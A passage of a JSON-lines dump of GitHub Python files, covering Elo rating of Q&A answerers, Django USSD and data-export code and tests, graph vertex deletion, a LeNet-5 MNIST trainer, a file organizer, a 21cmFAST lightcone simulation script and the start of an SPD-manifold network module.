range(len(answerer_list)):\n opponent = answerer_list[j]\n\n if (me == opponent):\n continue\n\n opponent_rating = user_stats_dict[opponent.user_id]['rating']\n opponent_answer_count = user_stats_dict[opponent.user_id]['answerCount']\n\n expected_score = calc_expected_score(my_rating, opponent_rating)\n actual_score = calc_actual_score(me.score, opponent.score)\n k_factor = calc_k_factor(my_answer_count, opponent_answer_count)\n rating_update_sum += k_factor * (actual_score - expected_score)\n\n # average\n final_rating_update = rating_update_sum / (len(answerer_list) - 1)\n rating_update_dict[me.user_id] = final_rating_update\n\n return rating_update_dict\n\n\ndef update_user_stats(answerer_list, user_stats_dict):\n if (len(answerer_list) < MIN_ANSWER_COUNT):\n raise MinAnswerCountError\n\n rating_update_dict = calc_elo_rating(answerer_list, user_stats_dict)\n\n for i in range(len(answerer_list)):\n user_stats_dict[answerer_list[i].user_id]['rating'] += rating_update_dict[answerer_list[i].user_id]\n user_stats_dict[answerer_list[i].user_id]['answerCount'] += 1\n\n\ndef measure_expertise(df):\n user_stats_dict = dict()\n answerer_list = list()\n question_id = -1\n\n for index, row in df.iterrows():\n if (row['answerer_id'] not in user_stats_dict):\n user_stats_dict[row['answerer_id']] = {'answerCount': 0, 'rating': 1500.0}\n\n if (question_id != row['question_id'] and question_id != -1):\n # next question\n\n update_user_stats(answerer_list, user_stats_dict)\n\n # reset variables\n question_id = row['question_id']\n del answerer_list[:]\n\n elif (question_id == -1):\n # first question\n question_id = row['question_id']\n\n answerer_list.append(AnswererInfo(row['answerer_id'], row['answer_score'], row['answer_id']))\n\n if (len(answerer_list) > 0):\n # last question\n\n update_user_stats(answerer_list, user_stats_dict)\n del answerer_list[:]\n\n return user_stats_dict\n","repo_name":"patrikpp/projects","sub_path":"analysis_of_users_in_cqa_systems/elo_rating.py","file_name":"elo_rating.py","file_ext":"py","file_size_in_byte":3388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5394306064","text":"'''\nCreated on Jul 12, 2012\n\n@author: asseym\n'''\nfrom django.conf import settings\n\ndef dictinvert(dict):\n inv = {}\n for k, v in dict.iteritems():\n inv[v]=k\n return inv\n\n\n\ndef get_summary_dict(session, ussd_menu_dict):\n results = ussd_menu_dict\n pin = None\n keys=dictinvert(ussd_menu_dict)\n for nav in session.navigations.all():\n if nav.screen.downcast().slug in settings.PIN_SLUGS:\n pin = nav.response\n else:\n results[keys.get(nav.screen.downcast().slug)] = nav.response\n results['SESSION'] = session.transaction_id\n results['MSISDN'] = session.connection.identity\n results['PIN'] = pin\n return results\n\ndef get_session_data_turples(session, ussd_menu_dict, action):\n \n results = ussd_menu_dict\n pin = None\n keys=dictinvert(ussd_menu_dict)\n for nav in session.navigations.all():\n val = settings.TRANSLATION_DICT.get(nav.screen.downcast().slug,None)\n if val in [\"death_summary\",\"birth_summary\"]:\n pin = nav.screen.downcast().slug\n if val:\n results[keys.get(nav.screen.downcast().slug)] = nav.response\n results['SESSION'] = 1123\n results['MSISDN'] = session.connection.identity\n results['PIN'] = pin\n results['ACTION'] = action\n \n return results.items()\n\n\ndef get_summary(session):\n summary = \"\"\n for nav in session.navigations.all():\n val = settings.TRANSLATION_DICT.get(nav.screen.downcast().slug,None)\n if val:\n summary += \"%s %s \" % (val, nav.response)\n return summary\n\n\ndef get_dictionary_for_session(session):\n def _all_match(session, positions):\n for position in range(len(positions)):\n if not session.navigations.order_by('date')[position].response== str(positions[position]):\n return False\n return True\n for dict in [getattr(settings,d) for d in dir(settings) if d.startswith('UTL_')]:\n if _all_match(session,dict['positions']):\n return dict\n raise Exception('Dictionary for this session cannot be found in session')","repo_name":"unicefuganda/mobileVRS","sub_path":"mobilevrs_project/mobilevrs/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"42254206002","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom django.contrib.auth.models import User\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.core.urlresolvers import reverse\nfrom django.db import IntegrityError, models\nfrom django.forms.models import inlineformset_factory\nfrom django.test import TestCase\nfrom data_exports.templatetags import getter_tags as ttags\nfrom data_exports.models import Format, Export, Column\nfrom data_exports.forms import ColumnForm, ColumnFormSet, get_choices\nfrom inspect_model import InspectModel\n\nfrom data_exports.compat import text_type\n\n\nclass ExportTest(TestCase):\n\n def setUp(self):\n # create an export of the Export model (inception !)\n ct = ContentType.objects.get(app_label='data_exports', model='export')\n self.empty_export = Export.objects.create(name='test empty export',\n slug='test-empty-export',\n model=ct)\n self.im = InspectModel(Export)\n\n # create an export of the Export model with columns\n self.export = Export.objects.create(name='test export',\n slug='test-export',\n model=ct)\n for f in self.im.items:\n Column.objects.create(export=self.export,\n column=f,\n order=0)\n\n user = User.objects.create_user('admin', 'admin@admin.com', 'admin')\n user.is_superuser = True\n user.save()\n\n def test_slug(self):\n \"\"\"Make sure the slug is unique.\"\"\"\n with self.assertRaises(IntegrityError):\n Export.objects.create(name='foo',\n slug=self.empty_export.slug,\n model=self.empty_export.model)\n\n def test_column_choices(self):\n \"\"\"Choices computed for the exported model\n\n When using the ColumnFormSet and the ColumnForm, all the accessible\n items (fields, relations, methods, attributes...) from the exported\n model are present in the \"column\" form field choices\n\n \"\"\"\n class OneToOneToExport(models.Model):\n \"\"\"Fake model.\n\n Make sure that get_choices works with\n SingleRelatedObjectDescriptor, as explained in ticket #4.\n\n \"\"\"\n name = models.CharField(max_length=50)\n o2o = models.OneToOneField(Export)\n\n # reload the model's relations, to have the OneToOneToExport's relation\n # taken into account\n self.empty_export._meta._fill_related_objects_cache()\n self.empty_export._meta.init_name_map()\n\n ColumnInlineFormSet = inlineformset_factory(Export,\n Column,\n form=ColumnForm,\n formset=ColumnFormSet)\n formset = ColumnInlineFormSet(instance=self.empty_export)\n # the column field has choices\n form = formset.forms[0]\n self.assertTrue(hasattr(form.fields['column'], 'choices'))\n choices = form.fields['column'].choices\n # all the model items are in the column field choices\n self.assertTrue(all([(i, i) in choices for i in self.im.items]))\n # and all the related model items are in the fields choices\n # export has a FK to Format named 'export_format'\n im_format = ['export_format.%s' % i\n for i in InspectModel(Format).items]\n self.assertTrue(all([(i, i) in choices for i in im_format]))\n # export has a FK to ContentType named 'model'\n im_ct = ['model.%s' % i for i in InspectModel(ContentType).items]\n self.assertTrue(all([(i, i) in choices for i in im_ct]))\n # OneToOneToExport has a OneToOneField to ContentType named\n # 'onetoonetoexport'\n im_o2o = ['onetoonetoexport.%s' % i\n for i in InspectModel(OneToOneToExport).items]\n self.assertTrue(all([(i, i) in choices for i in im_o2o]))\n # revert changes to name_map: 'unload' the OneToOneToExport relation\n del self.empty_export._meta._name_map['onetoonetoexport']\n\n def test_export_without_format(self):\n \"\"\"Export without a format renders to a simple template\"\"\"\n self.client.login(username='admin', password='admin')\n # empty export\n resp = self.client.get(reverse('data_exports:export_view',\n kwargs={'slug': self.empty_export.slug}))\n self.assertContains(resp, 'No columns where defined')\n # full export\n resp = self.client.get(reverse('data_exports:export_view',\n kwargs={'slug': self.export.slug}))\n self.assertNotContains(resp, 'No columns where defined')\n for c in self.export.column_set.all():\n self.assertContains(resp, c.label if c.label else c)\n\n def test_export_with_format(self):\n \"\"\"Export with a format gives a file download\"\"\"\n # create a format for a \"naive csv export\"\n csv_format = Format.objects.create(\n name='naive csv',\n file_ext='csv',\n mime='text/csv',\n template='data_exports/export_detail_csv.html')\n\n self.client.login(username='admin', password='admin')\n\n self.export.export_format = csv_format\n self.export.save()\n resp = self.client.get(reverse('data_exports:export_view',\n kwargs={'slug': self.export.slug}))\n self.assertEqual(resp['Content-Type'], self.export.export_format.mime)\n self.assertEqual(resp['Content-Disposition'],\n 'attachment; filename=%s.%s' % (\n self.export.slug,\n self.export.export_format.file_ext))\n\n def test_export_templatetag(self):\n \"\"\"Templatetags provided for convenience\"\"\"\n # getattribute\n self.assertEqual(ttags.getattribute(self.export, 'model'),\n getattr(self.export, 'model'))\n # getvalue\n d = {'foo': 'bar'}\n self.assertEqual(ttags.getvalue(d, 'foo'), d.get('foo'))\n # nice_display: displays a list for FK and ManyToMany\n column_list = ttags.nice_display(self.export.column_set).split(', ')\n for c in self.export.column_set.all():\n self.assertTrue(text_type(c) in column_list)\n # make sure getattribute and nice_display work on all choices\n for c, name in get_choices(Export):\n e = ttags.getattribute(self.export, c)\n ttags.nice_display(e)\n\n\nclass AdminTest(TestCase):\n\n def setUp(self):\n user = User.objects.create_user('admin', 'admin@admin.com', 'admin')\n user.is_staff = True\n user.is_superuser = True\n user.save()\n\n def test_create_export(self):\n self.client.login(username='admin', password='admin')\n ct = ContentType.objects.get(app_label='data_exports', model='export')\n resp = self.client.post(reverse('admin:data_exports_export_add'), {\n 'name': 'test export',\n 'slug': 'test-export',\n 'model': ct.pk,\n '_save': 'Save'})\n # when creating, \"save\" is equivalent to \"save and continue editing\"\n self.assertRedirects(resp,\n reverse('admin:data_exports_export_change',\n args=[1])) # first export created, id=1\n\n # once an export is created, it's no more possible to modify its model\n resp = self.client.get(reverse('admin:data_exports_export_change',\n args=[1]))\n self.assertContains(resp, 'name=\"export_format\"')\n self.assertNotContains(resp, 'name=\"model\"')\n","repo_name":"magopian/django-data-exports","sub_path":"data_exports/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":7890,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"3"} +{"seq_id":"72426693520","text":"import random\n\nfrom utility.graph import *\n\n\ndef delete_random_vertices(vertices, edges, n):\n \"\"\"\n Deletes n random vertices from vertex list and removes the edges corresponding to them.\n\n :param vertices: List of Vertex objects\n :param edges: List of Edge objects\n :param n: Number of vertices to remove\n :return: (new_vertices, new_edges, edges_removed) - edges_removed is the number of edges that were\n deleted in the end\n \"\"\"\n\n # Make sure the number of vertices being removed makes sense.\n assert(n <= len(vertices))\n\n # Shuffle list of vertices and pick ids of first n vertices for removal.\n random.shuffle(vertices)\n removal_ids = [vertices[i].id for i in range(n)]\n\n # Remove these and return result.\n return remove_vertices(vertices, edges, removal_ids)\n\n\ndef remove_vertices(vertices, edges, vertex_ids):\n \"\"\"\n Wrapper for remove_vertex function designed to remove multiple vertices at once.\n\n :param vertices: List of Vertex objects\n :param edges: List of Edge objects\n :param vertex_ids: ID numbers of vertices to remove\n :return: (new_vertices, new_edges, edges_removed) - edges_removed is the number of edges that were\n deleted in the end\n \"\"\"\n\n # Maintain list of edges removed for each vertex.\n removed_edges = []\n\n for vertex_id in vertex_ids:\n\n # Remove individual vertex and increment number of edges removed.\n vertices, edges, removed = remove_vertex(vertices, edges, vertex_id)\n removed_edges.append(removed)\n\n return vertices, edges, removed_edges\n\n\ndef remove_vertex(vertices, edges, vertex_id):\n \"\"\"\n Removes a single vertex from vertex and edge list pair. Deletes vertex from vertex list and removes all edges\n containing that vertex from the edge list.\n\n :param vertices: List of Vertex objects\n :param edges: List of Edge objects\n :param vertex_id: ID number of vertex to remove\n :return: (new_vertices, new_edges, edges_removed) - edges_removed is the number of edges that were\n deleted in the end\n \"\"\"\n\n # Initialize output details.\n edges_removed = []\n\n # Remove vertex from vertex list and update ids.\n new_vertices = []\n\n for v in vertices:\n if v.id != vertex_id:\n\n # Decrease id by one if its id is greater than the one being removed.\n if v.id > vertex_id:\n v.id -= 1\n\n # Add this vertex to new vertex list.\n new_vertices.append(v)\n\n # Initialize new edge list.\n new_edges = []\n\n # Remove edges containing that vertex.\n for edge in edges:\n\n # Edge should be removed if the in vertex or out vertex is the target vertex.\n if edge.in_vertex == vertex_id or edge.out_vertex == vertex_id:\n\n # Increment number of edges removed.\n edges_removed.append(edge)\n\n else:\n\n # Update ids.\n edge.in_vertex -= 1 if edge.in_vertex > vertex_id else 0\n edge.out_vertex -= 1 if edge.out_vertex > vertex_id else 0\n\n # Edge doesn't contain target vertex.\n new_edges.append(edge)\n\n return new_vertices, new_edges, edges_removed\n","repo_name":"jdriscoll7/distributed-slam","sub_path":"distributed-slam/perturbations/deletions.py","file_name":"deletions.py","file_ext":"py","file_size_in_byte":3294,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"37458527714","text":"# -*- coding: utf-8 -*-\n\n\nfrom requests import get\n\ndef download_file(url, file_name):\n with open(file_name, \"wb\") as file:\n response = get(url)\n file.write(response.content)\n\n# Commented out IPython magic to ensure Python compatibility.\nimport gzip\nimport numpy as np\nimport pandas as pd\nfrom time import time\n\nfrom sklearn.model_selection import train_test_split\nimport tensorflow as tf\nimport keras\nimport keras.layers as layers\nfrom keras.models import Sequential\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.utils.np_utils import to_categorical\nfrom keras.callbacks import TensorBoard\n\n# %matplotlib inline\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set()\n\ndef read_mnist(images_path: str, labels_path: str):\n with gzip.open(labels_path, 'rb') as labelsFile:\n labels = np.frombuffer(labelsFile.read(), dtype=np.uint8, offset=8)\n\n with gzip.open(images_path,'rb') as imagesFile:\n length = len(labels)\n # Load flat 28x28 px images (784 px), and convert them to 28x28 px\n features = np.frombuffer(imagesFile.read(), dtype=np.uint8, offset=16) \\\n .reshape(length, 784) \\\n .reshape(length, 28, 28, 1)\n \n return features, labels\n\ntrain = {}\ntest = {}\n\ntrain['features'], train['labels'] = read_mnist('train-images-idx3-ubyte.gz', 'train-labels-idx1-ubyte.gz')\ntest['features'], test['labels'] = read_mnist('t10k-images-idx3-ubyte.gz', 't10k-labels-idx1-ubyte.gz')\n\nprint('# of training images:', train['features'].shape[0])\nprint('# of test images:', test['features'].shape[0])\n\n\"\"\"### Split training data into training and validation\"\"\"\n\nvalidation = {}\ntrain['features'], validation['features'], train['labels'], validation['labels'] = train_test_split(train['features'], train['labels'], test_size=0.2, random_state=0)\n\nprint('# of training images:', train['features'].shape[0])\nprint('# of validation images:', validation['features'].shape[0])\n\n\"\"\"## Zero Padding\n\n\n\n\n\nThe LeNet architecture accepts a 32x32 pixel images as input, mnist data is 28x28 pixels.\n\"\"\"\n\n# Pad images with 0s\ntrain['features'] = np.pad(train['features'], ((0,0),(2,2),(2,2),(0,0)), 'constant')\nvalidation['features'] = np.pad(validation['features'], ((0,0),(2,2),(2,2),(0,0)), 'constant')\ntest['features'] = np.pad(test['features'], ((0,0),(2,2),(2,2),(0,0)), 'constant')\n \nprint(\"Updated Image Shape: {}\".format(train['features'][0].shape))\n\nmodel = keras.Sequential()\n\nmodel.add(layers.Conv2D(filters=6, kernel_size=(3, 3), activation='relu', input_shape=(32,32,1)))\nmodel.add(layers.AveragePooling2D())\n\nmodel.add(layers.Conv2D(filters=16, kernel_size=(3, 3), activation='relu'))\nmodel.add(layers.AveragePooling2D())\n\nmodel.add(layers.Flatten())\n\nmodel.add(layers.Dense(units=120, activation='relu'))\n\nmodel.add(layers.Dense(units=84, activation='relu'))\n\nmodel.add(layers.Dense(units=10, activation = 'softmax'))\n\nmodel.summary()\n\nmodel.compile(loss=keras.losses.categorical_crossentropy, optimizer=keras.optimizers.Adam(), metrics=['accuracy'])\n\nEPOCHS = 40\nBATCH_SIZE = 128\n\nX_train, y_train = train['features'], to_categorical(train['labels'])\nX_validation, y_validation = validation['features'], to_categorical(validation['labels'])\n\ntrain_generator = ImageDataGenerator().flow(X_train, y_train, batch_size=BATCH_SIZE)\nvalidation_generator = ImageDataGenerator().flow(X_validation, y_validation, batch_size=BATCH_SIZE)\n\nprint('# of training images:', train['features'].shape[0])\nprint('# of validation images:', validation['features'].shape[0])\n\nsteps_per_epoch = X_train.shape[0]//BATCH_SIZE\nvalidation_steps = X_validation.shape[0]//BATCH_SIZE\n\ntensorboard = TensorBoard(log_dir=\"logs/{}\".format(time()))\nhistory = model.fit(train_generator, steps_per_epoch=steps_per_epoch, epochs=EPOCHS, \n validation_data=validation_generator, validation_steps=validation_steps, \n shuffle=True, callbacks=[tensorboard])\n\nscore = model.evaluate(test['features'], to_categorical(test['labels']))\nprint('Test loss:', score[0])\nprint('Test accuracy:', score[1])\n\n# Plot training & validation accuracy values\nplt.plot(history.history['acc'])\nplt.plot(history.history['val_acc'])\nplt.title('Model accuracy')\nplt.ylabel('Accuracy')\nplt.xlabel('Epoch')\nplt.legend(['Train', 'Test'], loc='upper left')\nplt.show()\n\n# Plot training & validation loss values\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('Model loss')\nplt.ylabel('Loss')\nplt.xlabel('Epoch')\nplt.legend(['Train', 'Test'], loc='upper left')\nplt.show()\n\n\"\"\"# **Confusion Matrix**\"\"\"\n\n#Confusion Matrix on training:\nfrom sklearn.metrics import confusion_matrix\ny_pred = model.predict_classes(X_train)\nrounded_y_train=np.argmax(y_train, axis=1)\n\n\nCM_train = confusion_matrix(rounded_y_train, y_pred )\nprint(CM_train)\n\n#Confusion Matrix on validation:\nfrom sklearn.metrics import confusion_matrix\ny_pred_test = model.predict_classes(X_validation)\nrounded_y_test=np.argmax(y_validation, axis=1)\n\n\nCM_test = confusion_matrix(rounded_y_test, y_pred_test )\nprint(CM_test)","repo_name":"Saba-Heidari/Machine-Learning","sub_path":"lenet5_mnist_zeropadding.py","file_name":"lenet5_mnist_zeropadding.py","file_ext":"py","file_size_in_byte":5127,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"29102857785","text":"from pathlib import Path, PosixPath\nfrom typing import List\nfrom enum import Enum\nimport os\nimport errno\nimport shutil\n\nclass OrganizerException(Exception):\n pass\n\nclass Answer(Enum):\n YES = 0\n NO = 1\n SKIP = 2\n LIST = 3\n\ndef AcceptDialog(message=\"Please indicate approval [y/n/s/l/?]: \") -> Answer:\n print(message, end='')\n yes = ['yes', 'y']\n no = ['no', 'n']\n skip = ['s']\n list_files = ['l']\n q = [\"?\"]\n\n answ = \"\"\n while True:\n choice = input().lower()\n if choice in yes:\n return Answer.YES\n if choice in no:\n return Answer.NO\n if choice in list_files:\n return Answer.LIST\n if choice in skip:\n return Answer.SKIP\n if choice in q:\n print(\"\\n\\ty - yes\"\n \"\\n\\tn - no\"\n \"\\n\\ts - skip\"\n \"\\n\\tl - list files\")\n\nclass OrganizerInstance:\n\n def __init__(self, src_dir:Path, out_dir:Path, ext_list:List[str]):\n\n if not (src_dir.exists() and src_dir.is_dir()):\n raise OrganizerException(\"Provided source directory doesn't exist or isn't a directory!\")\n\n self.src_dir = src_dir\n self.out_dir = out_dir\n self.ext_list = [x.lower() for x in ext_list]\n\n\n def organize(self, dry_run:bool=False):\n print(f\"Starting organizing process. dry_run={dry_run}\")\n print(f\"Searching for following extensions: {self.ext_list}\")\n self.parse_dir(self.src_dir, dry_run=dry_run)\n print(\"\\nFiles organized!\")\n\n\n def parse_dir(self, act_dir: Path, dry_run:bool, path_prefix:Path=None):\n dirs_to_parse = []\n files_to_copy = []\n\n for ch in act_dir.iterdir():\n try:\n # Parse child directories later\n if ch.is_dir():\n dirs_to_parse.append(ch)\n continue\n\n # Skip non regular files\n if not ch.is_file():\n continue\n\n if ch.suffix.lower() in self.ext_list:\n files_to_copy.append(ch)\n\n except PermissionError as e:\n print(\"Insufficient permissions\")\n print(e)\n\n if files_to_copy:\n # Prepare path prefix with folder\n initialized_path_prefix = False\n if path_prefix is None:\n initialized_path_prefix = True\n path_prefix = Path(act_dir.resolve().absolute().name or \"root\")\n\n print()\n print(f\"In source directory \\t{act_dir.relative_to(self.src_dir)}\"\n f\"\\n\\tfound {len(files_to_copy)} specified files!\")\n print(f\"Files will be copied to directory: \\t {path_prefix}\")\n\n while True:\n accepted = AcceptDialog()\n if accepted == Answer.LIST:\n print(\"The following files were found:\")\n for file in files_to_copy:\n print(f\"\\t{file}\")\n if accepted == Answer.YES:\n copy_target_dir = self.out_dir / path_prefix\n self.mkdir_p(copy_target_dir, dry_run=dry_run)\n for file in files_to_copy:\n self.copy(file.absolute(), self.out_dir / path_prefix, dry_run=dry_run)\n print(\"Files copied successfully\")\n break\n elif accepted == Answer.NO:\n # Unset path prefix if this is determined to not be the root directory of specified files\n if initialized_path_prefix:\n path_prefix = None\n break\n elif accepted == Answer.SKIP:\n # Skip file copying and recursive directory parsing\n return\n\n for ch_dir in dirs_to_parse:\n new_path_prefix = (path_prefix / ch_dir.name) if path_prefix else None\n self.parse_dir(ch_dir, dry_run, new_path_prefix)\n\n def mkdir_p(self, path: Path, dry_run: bool):\n # TODO: Add statistics\n if dry_run:\n return\n try:\n os.makedirs(path)\n except OSError as exc:\n if exc.errno == errno.EEXIST or os.path.isdir(path):\n pass\n else:\n raise exc\n\n def copy(self, src_file: Path, target: Path, dry_run: bool):\n # TODO: Add statistics\n if dry_run:\n return\n shutil.copy(src_file, target)\n\n","repo_name":"PPakalns/fileOrg","sub_path":"src/organizer.py","file_name":"organizer.py","file_ext":"py","file_size_in_byte":4493,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"27096311556","text":"import numpy as np, os, sys, json, tarfile\nimport tools21cm as t2c, py21cmfast as p2c \n\nfrom datetime import datetime \nfrom skopt.sampler import Lhs\nfrom skopt.space import Space\nfrom glob import glob\nfrom sklearn.decomposition import PCA as sciPCA\n\npath_out = sys.argv[1]\npath_out += '/' if path_out[-1]!='/' else ''\n\nprint(' Starting at: %s' %(datetime.now().strftime('%H:%M:%S')))\n\n\"\"\"\ncoeval_cubes = p2c.run_coeval(\n redshift = 9.0,\n user_params = {\"HII_DIM\": 300, \"BOX_LEN\": 600, \"USE_INTERPOLATION_TABLES\": True, 'N_THREADS': 8},\n cosmo_params = p2c.CosmoParams(SIGMA_8=0.8),\n astro_params = p2c.AstroParams({\"HII_EFF_FACTOR\":20.0}),\n random_seed=12345)\n\n#coeval_cubes[0].brightness_temp_struct.save('%sbox_z9_zeta20.00_tvir5.00_rmfp15.00_21cmFast_brightness_temp_600cMpc.h5' %(path_out))\nnp.save('%sbox_z9_zeta20.00_tvir5.00_rmfp15.00_21cmFast_brightness_temp_600cMpc.npy' %(path_out), coeval_cubes.brightness_temp)\n\n\"\"\"\ntry:\n os.makedirs(path_out)\n os.makedirs(path_out+'data')\n os.makedirs(path_out+'images')\n os.makedirs(path_out+'parameters')\nexcept:\n pass\n\nname_of_the_run = path_out[path_out[:-1].rfind('/')+1:-1]\n\n# Change working directory:\nos.chdir(path_out+'..')\ncwd = os.getcwd()\n\n\n# 21cmFAST parameters\n#uvfile = '/store/ska/sk09/segunet/uvmap_128_z7-20.pkl'\n#uvfile = '/store/ska/sk09/segunet/uvmap_200_z7-35.pkl'\nuvfile = '/store/ska/sk02/lightcones/EOS21/uvmap_1000_z7-11.pkl'\n\n#params = {'HII_DIM':128, 'DIM':512, 'BOX_LEN':256}\nparams = {'HII_DIM':200, 'DIM':600, 'BOX_LEN':300, 'USE_INTERPOLATION_TABLES': False}\nc_params = {'OMm':0.27, 'OMb':0.046, 'SIGMA_8':0.82, 'POWER_INDEX':0.96}\nz_min, z_max = 5.000, 29.999\ntobs = 1000.\nCOMPRESS = False\nMAKE_PLOT = False\n\npath_cache = '/scratch/snx3000/mibianco/21cmFAST-cache/'\np2c.config['direc'] = path_cache\n\nwith open(path_out+'parameters/user_params.txt', 'w') as file:\n file.write(json.dumps(params))\n\nwith open(path_out+'parameters/cosm_params.txt', 'w') as file:\n file.write(json.dumps(c_params))\n\n\n# Start loop\ni, rseed = 0, 2022\nprint(' generated seed:\\t %d' %rseed)\n\n# Latin Hypercube Sampling of parameters\nspace = Space([(10., 100.), (5., 20.), (np.log10(1e4), np.log10(2e5)), (38.0, 42.), (100., 1500.)]) \nlhs_sampling = np.array(Lhs(criterion=\"maximin\", iterations=10000).generate(dimensions=space.dimensions, n_samples=1, random_state=rseed))\neff_fact, Rmfp, Tvir, LX, E0 = lhs_sampling[0]\n\n# Define astronomical parameters\na_params = {'HII_EFF_FACTOR':eff_fact, 'R_BUBBLE_MAX':Rmfp, 'ION_Tvir_MIN':Tvir, 'L_X': LX, 'NU_X_THRESH': E0}\n\nprint(' calculate lightcone...') \nlightcone = p2c.run_lightcone(redshift=z_min, max_redshift=z_max, \n user_params=params, astro_params=a_params, cosmo_params=c_params, \n lightcone_quantities=(\"brightness_temp\", 'xH_box'), \n flag_options={\"USE_TS_FLUCT\": True},\n global_quantities=(\"brightness_temp\", 'xH_box'), \n direc=path_cache, random_seed=rseed) \n\nnp.savetxt('%slc_redshifts.txt' %(path_out), lightcone.lightcone_redshifts, fmt='%.5f')\ndT = lightcone.brightness_temp\nt2c.save_cbin(path_out+'data/xHI_21cm_i%d.bin' %i, lightcone.xH_box)\nt2c.save_cbin(path_out+'data/dT_21cm_i%d.bin' %i, dT)\n\nlc_noise = t2c.noise_lightcone(ncells=lightcone.brightness_temp.shape[0], \n zs=lightcone.lightcone_redshifts, \n obs_time=tobs, save_uvmap=uvfile, \n boxsize=params['BOX_LEN'], n_jobs=1)\n\n#print(' calculate foregrounds...')\ngal_fg = t2c.galactic_synch_fg(z=lightcone.lightcone_redshifts, ncells=params['HII_DIM'], boxsize=params['BOX_LEN'], rseed=rseed)\nexgal_fg = t2c.extragalactic_pointsource_fg(z=lightcone.lightcone_redshifts, ncells=params['HII_DIM'], boxsize=params['BOX_LEN'], rseed=rseed)\n\nprint(' calculate dT and mask...') \ndT1 = t2c.subtract_mean_signal(lightcone.brightness_temp, los_axis=2) \ndT2, redshifts = t2c.smooth_lightcone(dT1, z_array=lightcone.lightcone_redshifts, box_size_mpc=params['BOX_LEN']) \ndT3, _ = t2c.smooth_lightcone(t2c.subtract_mean_signal(dT + lc_noise, los_axis=2), z_array=lightcone.lightcone_redshifts, box_size_mpc=params['BOX_LEN']) \ndT4, _ = t2c.smooth_lightcone(t2c.subtract_mean_signal(dT + lc_noise + gal_fg, los_axis=2), z_array=lightcone.lightcone_redshifts, box_size_mpc=params['BOX_LEN'])\ndT5, _ = t2c.smooth_lightcone(t2c.subtract_mean_signal(dT + lc_noise + exgal_fg + gal_fg, los_axis=2), z_array=lightcone.lightcone_redshifts, box_size_mpc=params['BOX_LEN'])\n\nprint(' calculate PCA...')\ndata = dT5\ndata_flat = np.reshape(data, (-1, data.shape[2]))\npca = sciPCA(n_components=7)\ndatapca = pca.fit_transform(data_flat)\npca_FG = pca.inverse_transform(datapca)\ndT5pca = np.reshape(data_flat - pca_FG, (params['HII_DIM'], params['HII_DIM'], data.shape[2]))\n\n#xHI = lightcone.xH_box\nsmt_xn, _ = t2c.smooth_lightcone(lightcone.xH_box, z_array=lightcone.lightcone_redshifts, box_size_mpc=params['BOX_LEN']) \nmask_xH = smt_xn>0.5\n\nprint(' save outputs...') \nt2c.save_cbin(path_out+'data/xH_21cm_i%d.bin' %i, mask_xH)\nt2c.save_cbin(path_out+'data/dT2_21cm_i%d.bin' %i, dT2) # smooth(dT - avrg_dT)\nt2c.save_cbin(path_out+'data/dT3_21cm_i%d.bin' %i, dT3) # smooth(dT + noise - avrg_dT)\nt2c.save_cbin(path_out+'data/dT4_21cm_i%d.bin' %i, dT4) # smooth(dT + noise + gf - avrg_dT)\nt2c.save_cbin(path_out+'data/dT5_21cm_i%d.bin' %i, dT5) # smooth(dT + noise + gf + exgf - avrg_dT)\nnp.save(path_out+'data/dTexgf_21cm_i%d.npy' %i, exgal_fg[..., 0]) # just the point sourcess\nt2c.save_cbin(path_out+'data/dT5pca_21cm_i%d.bin' %i, dT5pca)\n\n# save parameters values\nwith open('%sastro_params.txt' %(path_out+'parameters/'), 'a') as f:\n f.write('# HII_EFF_FACTOR: The ionizing efficiency of high-z galaxies\\n')\n f.write('# R_BUBBLE_MAX: Mean free path in Mpc of ionizing photons within ionizing regions\\n')\n f.write('# ION_Tvir_MIN: Minimum virial Temperature of star-forming haloes in log10 units\\n')\n f.write('#i\\teff_f\\tRmfp\\tTvir\\tseed\\n')\n f.write('%d\\t%.3f\\t%.3f\\t%.3f\\t%d\\n' %(i, eff_fact, Rmfp, Tvir, rseed))\n\n#os.system('rm -r %s' %path_cache)\nprint('... done at %s.' %(datetime.now().strftime('%H:%M:%S')))\n","repo_name":"micbia/SegU-Net","sub_path":"utils_data/run_lc.py","file_name":"run_lc.py","file_ext":"py","file_size_in_byte":6261,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"4009480700","text":"# -*- coding: utf-8 -*-\n# @Auther : Mingsong Li (lms-07)\n# @Time : 2023-Apr\n# @Address : Time Lab @ SDU\n# @FileName : manifold_learning_fun.py\n# @Project : AMS-M2ESL (HSIC), IEEE TGRS\n\n# based on the source code of RBN, i.e., A Riemannian Network for SPD Matrix Learning, NeurIPS 2019\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Function as F\n\n\nclass StiefelParameter(nn.Parameter):\n \"\"\" Parameter constrained to the Stiefel manifold (for BiMap layers) \"\"\"\n pass\n\n\nclass SPDParameter(nn.Parameter):\n \"\"\" Parameter constrained to the SPD manifold (for ParNorm) \"\"\"\n pass\n\n\ndef init_bimap_parameter(W):\n \"\"\" initializes a (ho,hi,ni,no) 4D-StiefelParameter\"\"\"\n # C* = C +λI , where I is the identity matrix, λ could be set to \\alpha× trace(C ), and \\alpha is a very small value like 10^(-6).\n ho, hi, ni, no = W.shape\n for i in range(ho): # can vectorize\n for j in range(hi): # can vectorize\n v = torch.empty(ni, ni, dtype=W.dtype,\n device=W.device).uniform_(0., 1.)\n inp_svd = v.matmul(v.t())\n alpha = 1e-5\n inp_svd = add_id_matrix(inp_svd, alpha)\n # vv = torch.svd(inp_svd)[0][:, :no]\n vv = 